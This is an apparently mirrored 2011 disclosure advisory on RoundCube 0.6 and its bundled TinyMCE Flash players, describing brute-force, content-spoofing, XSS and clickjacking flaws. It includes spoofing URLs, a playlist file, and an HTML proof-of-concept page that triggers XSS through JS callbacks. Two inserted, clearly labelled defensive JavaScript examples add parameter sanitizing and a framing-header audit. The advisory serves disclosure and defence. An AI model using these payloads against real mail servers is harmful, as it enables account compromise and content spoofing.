RoundCube 0.6 Content Spoofing / Cross Site Scripting

01 Dec 2011 - Reported by MustLive - Source: packetstormsecurity.com

RoundCube 0.6 content spoofing and XSS vulnerabilities; clickjacking risk also highlighted.

Hello list!  
  
I want to warn you about multiple vulnerabilities in RoundCube.  
  
These are Brute Force, Content Spoofing, Cross-Site Scripting and  
Clickjacking vulnerabilities. CS and XSS are in TinyMCE, which is included  
with RoundCube.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are RoundCube 0.6 and previous versions (checked in 0.4-beta and  
0.6). The latest version, RoundCube 0.6, uses moxieplayer.swf (instead of  
flv_player.swf).  
  
As the developers informed me, these vulnerabilities will be fixed in  
version RoundCube 0.7.  
  
----------  
Details:  
----------  
  
Brute Force (WASC-11):  
  
http://site/index.php  
  
Content Spoofing (WASC-12):  
  
The swf file of flvPlayer accepts arbitrary addresses in the parameters flvToPlay and  
startImage, which allows spoofing the content of the Flash file, i.e. by setting  
addresses of video and/or image files from another site.  
  
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv  
  
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg  
  
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg  
  
The swf file of flvPlayer accepts arbitrary addresses in the parameter flvToPlay,  
which allows spoofing the content of the Flash file, i.e. by setting the address of a playlist  
file from another site (the parameters thumbnail and url in the xml file accept  
arbitrary addresses).  
  
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml  
  
File 1.xml:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<playlist>  
<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>  
<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>  
</playlist>  
  
XSS (WASC-08):  
  
If, on a page of the site with flv_player.swf (with the parameter jsCallback=true,  
or if there is a possibility to set this parameter for flv_player.swf), there  
is a possibility to include JS code with the function flvStart() and/or flvEnd()  
(via HTML Injection), then it is possible to conduct an XSS attack. I.e.  
JS callbacks can be used for an XSS attack.  
  
Example of exploit:  
  
<html>  
<body>  
<script>  
function flvStart() {  
alert('XSS');  
}  
function flvEnd() {  
alert('XSS');  
}  
</script>  
<object width="50%" height="50%">  
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">  
<param name=quality value=high>  
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%"  
height="50%" quality=high  
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"  
type="application/x-shockwave-flash"></embed>  
</object>  
</body>  
</html>  
  
Content Spoofing (WASC-12):  
  
http://site/program/js/tiny_mce/plugins/media/moxieplayer.swf?url=1.flv  
  
This swf file accepts arbitrary addresses in the parameter url, which allows  
spoofing the content of the Flash file, i.e. by setting the address of a video file  
from another site.  
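The following is an added example, not code from RoundCube, TinyMCE, or the original post. It shows, for both the flv_player.swf parameters above (flvToPlay, startImage, and the playlist's url/thumbnail attributes) and the moxieplayer.swf url parameter, the check that a fixed player or the server-side code building the embed tag would need: only addresses that resolve to the page's own origin are kept, and the jsCallback switch from the XSS section is never passed through. The page URL in PLAYER_PAGE, the option-parameter allowlist and the overall allowlist policy are assumptions for this example; the sample inputs are constructed from the URLs quoted in the post.

```javascript
// Added example, not RoundCube/TinyMCE code. Enforces the origin rule that the
// advisory shows flv_player.swf and moxieplayer.swf lack: every address
// parameter must resolve to the page's own origin, and the jsCallback switch
// (which makes the player call flvStart()/flvEnd() on the page) is dropped.
// PLAYER_PAGE and the parameter allowlists are assumptions for this example.

const PLAYER_PAGE = 'http://site/program/js/tiny_mce/plugins/media/img/';

// Parameters that carry an address the player will fetch (names from the advisory).
const URL_PARAMS = new Set(['flvToPlay', 'startImage', 'url']);
// Parameters that carry a plain option and can be passed through (assumed list).
const OPTION_PARAMS = new Set(['autoStart', 'quality']);

// Resolve `value` the way the player would (relative to the page) and accept
// it only if it is an http(s) address on the page's own origin.
function isSameOriginMedia(value, pageUrl = PLAYER_PAGE) {
  let target;
  try {
    target = new URL(value, pageUrl);
  } catch (e) {
    return false; // unparsable address
  }
  if (target.protocol !== 'http:' && target.protocol !== 'https:') return false;
  return target.origin === new URL(pageUrl).origin;
}

// Filter a player query string. Returns { ok, query, rejected }, where `query`
// is the safe query string to embed and `rejected` explains each dropped item.
function sanitizePlayerQuery(query, pageUrl = PLAYER_PAGE) {
  const output = new URLSearchParams();
  const rejected = [];
  for (const [name, value] of new URLSearchParams(query)) {
    if (name === 'jsCallback') {
      rejected.push({ name, value, reason: 'JS callbacks disabled' });
    } else if (URL_PARAMS.has(name)) {
      if (isSameOriginMedia(value, pageUrl)) output.append(name, value);
      else rejected.push({ name, value, reason: 'address not on page origin' });
    } else if (OPTION_PARAMS.has(name)) {
      output.append(name, value);
    } else {
      rejected.push({ name, value, reason: 'unknown parameter' });
    }
  }
  return { ok: rejected.length === 0, query: output.toString(), rejected };
}

// Apply the same rule to the thumbnail/url attributes of a playlist XML file.
// The attribute scan is deliberately minimal for the two-attribute format
// shown in the advisory; production code would use a real XML parser.
function checkPlaylist(xml, pageUrl = PLAYER_PAGE) {
  const offending = [];
  const attr = /\b(thumbnail|url)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = attr.exec(xml)) !== null) {
    if (!isSameOriginMedia(m[2], pageUrl)) offending.push({ attr: m[1], value: m[2] });
  }
  return offending;
}

// Constructed samples built from the URLs quoted in the advisory.
const SAMPLE_QUERIES = [
  'flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg',
  'flvToPlay=1.flv&jsCallback=true',
  'url=//site2/1.flv',
  'flvToPlay=1.flv&autoStart=false',
];
const SAMPLE_PLAYLIST = `<?xml version="1.0" encoding="UTF-8"?>
<playlist>
<item name="Content Spoofing" thumbnail="1.jpg" url="http://site2/1.flv"/>
<item name="Content Spoofing" thumbnail="http://site2/2.jpg" url="2.flv"/>
</playlist>`;

for (const q of SAMPLE_QUERIES) console.log(q, '=>', sanitizePlayerQuery(q));
console.log('playlist offenders:', checkPlaylist(SAMPLE_PLAYLIST));
```

Resolving each value against the page URL before comparing origins is what catches the protocol-relative form (`//site2/1.flv`) and non-http schemes, which a plain "does it start with http://" test would miss; relative names such as `1.flv` stay on the page's origin and pass unchanged.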
  
Clickjacking:  
  
RoundCube is vulnerable to remote login using Clickjacking  
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-October/008090.html).  
I have already written about such attacks in my article.  
  
In version RoundCube 0.6-RC, protection against Clickjacking attacks was added  
(except for the above-mentioned login form), to which all functionality of  
the application is vulnerable. But the method is not effective enough,  
because it works only in new versions of some browsers, so all users of  
older browsers are unprotected. And old versions of RoundCube are fully  
vulnerable to Clickjacking.  
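The post does not name the protection mechanism added in 0.6-RC. The following is an added example, not RoundCube's code, that assumes the mechanism is the X-Frame-Options response header (an assumption; that header was indeed honoured only by newer browsers in 2011) and audits a set of pages for header-based framing protection, reporting a page with no header, such as the login form described above, as unprotected and reminding that a header-only defence still leaves older browsers without a fallback. The response heads and page labels are constructed samples, not captured from a RoundCube installation; the CSP frame-ancestors check is the later, more general form of the same header defence.

```javascript
// Added example, not RoundCube code. Audits HTTP response heads for framing
// protection. Assumes the 0.6-RC mechanism the advisory refers to is the
// X-Frame-Options header (assumption, not stated in the post).

// Parse a raw HTTP response head (status line + headers) into a map keyed by
// lowercase header name; repeated headers are joined with ", ".
function parseResponseHead(raw) {
  const headers = {};
  for (const line of raw.split(/\r?\n/).slice(1)) { // skip the status line
    const idx = line.indexOf(':');
    if (idx < 1) continue;
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    headers[name] = name in headers ? headers[name] + ', ' + value : value;
  }
  return headers;
}

// Decide whether the response forbids framing by third-party pages.
// Returns { xfo, frameAncestors, protectedByHeader }.
function framingPolicy(headers) {
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  const csp = headers['content-security-policy'] || '';
  const fa = /frame-ancestors\s+([^;]+)/i.exec(csp);
  const frameAncestors = fa ? fa[1].trim() : null;
  // DENY/SAMEORIGIN block cross-site framing; any other X-Frame-Options
  // value (or none) does not. A frame-ancestors list blocks it unless it
  // contains the bare wildcard source.
  const xfoBlocks = xfo === 'DENY' || xfo === 'SAMEORIGIN';
  const tokens = frameAncestors ? frameAncestors.split(/\s+/) : [];
  const cspBlocks = tokens.length > 0 && !tokens.includes('*');
  return { xfo: xfo || null, frameAncestors, protectedByHeader: xfoBlocks || cspBlocks };
}

// Audit pages given as { page, raw }. A page whose only framing defence is a
// header still needs a script fallback for browsers that ignore the header
// (the gap the advisory describes); a page with no header is unprotected.
function auditFraming(pages) {
  return pages.map(({ page, raw }) => {
    const policy = framingPolicy(parseResponseHead(raw));
    return {
      page,
      headerProtection: policy.protectedByHeader,
      status: policy.protectedByHeader
        ? 'header only; add script fallback for older browsers'
        : 'UNPROTECTED: framable from any site',
    };
  });
}

// Constructed sample responses (labels only; not captured from a real install).
const SAMPLE_PAGES = [
  { page: 'mail view (sample)',
    raw: 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nX-Frame-Options: sameorigin\r\n' },
  { page: 'login form index.php (sample)',
    raw: 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n' },
];

for (const result of auditFraming(SAMPLE_PAGES)) console.log(result);
```

The script fallback the audit asks for is the usual legacy pattern of hiding the document body until a script confirms `self === top`; browsers that ignore X-Frame-Options still run that script, which is why the header alone left older-browser users exposed in the way the post describes.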
  
------------  
Timeline:  
------------  
  
2011.10.15 - found vulnerabilities.  
2011.10.18 - announced at my site.  
2011.10.21 - informed the developer of RoundCube. During my conversation with the  
developer in October-November, he decided to fix them and was working on  
fixes for these holes.  
2011.11.23 - the developer of RoundCube informed me that all fixes had been made  
and would be added to the next release, RoundCube 0.7.  
2011.11.30 - disclosed at my site.  
  
I mentioned these vulnerabilities at my site:  
http://websecurity.com.ua/5448/  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
  
